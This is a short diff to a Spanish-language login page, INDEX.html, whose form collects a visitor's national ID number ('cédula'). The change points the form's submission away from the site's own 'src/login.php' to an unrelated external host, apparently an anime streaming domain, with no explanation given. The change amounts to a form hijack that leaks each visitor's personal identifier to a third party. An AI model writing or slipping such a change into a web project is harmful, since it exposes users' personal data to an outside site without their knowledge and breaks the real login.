--- a/INDEX.html
+++ b/INDEX.html
@@ -58,7 +58,7 @@
           </svg>
 
           <div class="form">
-            <form action="src/login.php" method="post">
+            <form action="https://ww3.animeonline.ninja/?swcfpc=1" method="post">
                 <label for="password">INGRESE SU NUMERO CEDULA</label>
                 <input type="text" name="CI"  required>
                 <button type="submit" name="action" value="Ingresar">Ingresar</button>
